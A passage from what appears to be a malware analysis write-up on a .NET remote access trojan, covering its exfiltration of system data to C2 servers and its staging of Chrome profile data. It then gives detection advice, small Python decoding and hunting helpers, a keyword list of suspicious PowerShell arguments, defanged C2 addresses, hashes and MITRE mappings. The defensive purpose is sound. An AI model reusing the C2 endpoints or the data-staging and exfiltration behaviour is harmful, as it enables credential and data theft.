Data transfer to C2
Two items can be highlighted in the data exfiltration event, shown below:
- The length and value of URL query parameter q
- The (empty) JSON array data
The URL query string contains hex data. When decoded, we can see that it collects a variety of system information about the infected system. We’ve seen this behavior before, but in this instance a GET request is used to submit the data.
{
"hwid": "IFU057AMU0FJADRXKOFTSXEDRKOJ0WJI",
"pn": "DESKTOP-JGDDLLD",
"os": "Windows 10",
"x": "x86",
"prm": "User",
"ver": "CS-DN/1.8"
}
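The q parameter can be decoded with a few lines of Python instead of CyberChef. This sketch assumes, based on the observation above, that the hex string decodes directly to UTF-8 JSON with no further encoding layer; the function name is hypothetical and the IP address in the usage note is a documentation placeholder.

```python
import json
from urllib.parse import parse_qs, urlsplit


def decode_q(url: str) -> dict:
    """Extract the hex-encoded q parameter from a URL and parse it as JSON."""
    query = parse_qs(urlsplit(url).query)
    q_hex = query["q"][0]
    return json.loads(bytes.fromhex(q_hex).decode("utf-8"))
```

For a captured request such as http://192.0.2.10/q/postv?q=7b22..., decode_q returns the same dictionary structure as the JSON object shown above.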
My sandbox was configured with a default installation/configuration of Firefox. Some of the files the trojan is looking for (e.g. logins.json) are not created by default. Therefore, during my analysis, the data array did not contain any data.
Staging data
Another interesting aspect is the malware’s capability to stage browser data in a custom folder before triggering the exfiltration process. The prepare method in the hvnc class copies the Chrome UserData directory to a temporary location named chrprf_bkp inside the user’s temp folder.
It then validates whether the directory exists and sends a GET request that ends with the query parameter s and value r.
Apart from the 200 OK response, I did not observe any other form of interaction with the staged files.
Prevention and Hunting Use Cases
When we talk about detecting/preventing fileless threats such as assemblies being loaded in memory, we must think of techniques that go beyond monitoring for process creation events and suspicious command line arguments. For prevention, AMSI is integrated in .NET Framework version 4.8 and inspects and flags malicious Assembly.Load() events. You can also monitor a particular set of ETW (Event Tracing for Windows) events related to assembly loading. ETW is a kernel-level event tracing mechanism built into Windows that handles the logging of system events. ETW has historically been used for performance monitoring and debugging applications; however, it is slowly becoming an essential data source for threat hunting. SilkETW, developed by Ruben Boonen, is a C# wrapper that can filter and collect ETW events.
In this case we are interested in the ETW events from the Microsoft-Windows-DotNETRuntime ETW provider. The sample below shows an event from SilkETW, after the RAT .NET DLL assembly was loaded in memory. SilkETW can also be configured to run as a service, and the JSON output can be consumed by a centralized logging platform such as the Elastic Stack.
{
"ProviderGuid": "e13c0d23-ccbc-4e12-931b-d9cc2eee27e4",
"ProviderName": "Microsoft-Windows-DotNETRuntime",
"EventName": "Loader/AssemblyLoad",
"OpcodeName": "AssemblyLoad",
"TimeStamp": "2020-11-23T12:43:01.9264932-05:00",
"ProcessID": 24924,
"ProcessName": "powershell",
...
"XmlEventData": {
"ProviderName": "Microsoft-Windows-DotNETRuntime",
"FullyQualifiedAssemblyName": "331be178-6e21-4292-a5e1-8175d61f5791,
Version=0.0.0.0, Culture=neutral, PublicKeyToken=null",
"EventName": "Loader/AssemblyLoad"
...
}
}
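Events like the one above can be triaged with a simple filter. The sketch below is one possible heuristic, not a vetted detection rule: it flags AssemblyLoad events from a PowerShell process where the assembly’s simple name is a GUID and the assembly is not strong-named (PublicKeyToken=null). The field names are taken from the sample event; the function name and the heuristic itself are my assumptions.

```python
import re

# Simple name formatted like 331be178-6e21-4292-a5e1-8175d61f5791
GUID_NAME = re.compile(
    r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.IGNORECASE
)


def is_suspicious_assembly_load(event: dict) -> bool:
    """Flag GUID-named, unsigned assemblies loaded by PowerShell."""
    if event.get("EventName") != "Loader/AssemblyLoad":
        return False
    if "powershell" not in str(event.get("ProcessName", "")).lower():
        return False
    fqn = event.get("XmlEventData", {}).get("FullyQualifiedAssemblyName", "")
    # The simple name is everything before the first comma.
    simple_name = fqn.split(",", 1)[0].strip()
    return bool(GUID_NAME.match(simple_name)) and "PublicKeyToken=null" in fqn
```

Legitimate dynamically generated assemblies can also lack a public key token, so the results should be treated as hunting leads rather than alerts.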
Other detection-patterns to hunt for:
- Suspicious PowerShell command line arguments such as Base64, -bxor and System.Reflection.
- Startup entries being created by a suspicious process such as powershell.exe or cmd.exe.
- Suspicious activity in the User’s/Public AppData folder, for example: creation of randomized folder/file names or execution of unsigned binaries. Establish a whitelist of legitimate files/folders and hunt for anomalies.
- Endpoints communicating directly to an IP-address (no DNS-lookup) - review network flow logs.
- HTTP POST requests with no prior GET request or missing headers such as Referer/Cookie.
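The first hunting pattern can be prototyped against exported process creation logs. This is a minimal sketch that searches a command line for the three keywords from the list above; the indicator names and the function name are hypothetical, and a production rule would need tuning against legitimate administrative scripts.

```python
import re

# One case-insensitive pattern per keyword from the hunting list.
INDICATORS = {
    "base64": re.compile(r"base64", re.IGNORECASE),
    "xor": re.compile(r"-bxor\b", re.IGNORECASE),
    "reflection": re.compile(r"system\.reflection", re.IGNORECASE),
}


def matched_indicators(command_line: str) -> list:
    """Return the sorted names of all indicators found in the command line."""
    return sorted(
        name for name, rx in INDICATORS.items() if rx.search(command_line)
    )
```

The first-stage command line from this sample matches the base64 and xor indicators, while the second-stage script additionally references System.Reflection.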
Indicators of Compromise
Type | Name | Value |
---|---|---|
File | Expert_PDF.exe | 0758e546302e5429f6662982f81e6afa9c28ee6666f1fecab44feb5f7f8aeb6f |
File | Sample-Invitation-Letter-For-Event-Participation.exe | 7d54089b2811a48f1bacd471cc1e7fdff344e81b5ce3cd02555f06a28ea79470 |
File | Sample-Invitation-Letter-For-Event-Participation.tmp | 3be8e9f9e76df60bc682887ea31813762e9d2c316260a702c3b3e54391a9111b |
File | 331be178-6e21-4292-a5e1-8175d61f5791.dll | 18a589c62cc5210faf0b036c4f9542e662afde9cf18d89898c35b856b4b35338 |
File | 02214bc8-7cce-4e8e-8bdf-299198e86000.dll | 243b7acb13df7f370d310892f58b9974380c9a073842cc308eb73d18d77401e3 |
Filename | %APPDATA%\solarmarker.dat | N/A |
IP-address | C2 | 45[.]146.165.221 |
IP-address | C2 | 45[.]146.165.222 |
URL | C2 | http[:]//45[.]146.165.221 |
URL | C2 | http[:]//45[.]146.165.222/q/postv?q= |
MITRE ATT&CK
Technique ID | Tactic | Technique |
---|---|---|
T1082 | Discovery | System Information Discovery |
T1129 | Execution | Shared Modules |
T1106 | Execution | Native API |
T1059 | Execution | Command and Scripting Interpreter |
T1204 | Execution | User Execution |
T1547 | Persistence | Boot or Logon Autostart Execution |
T1003 | Credential Access | Credential Dumping |
T1071 | Command and Control | Application Layer Protocol |
T1041 | Exfiltration | Exfiltration Over C2 Channel |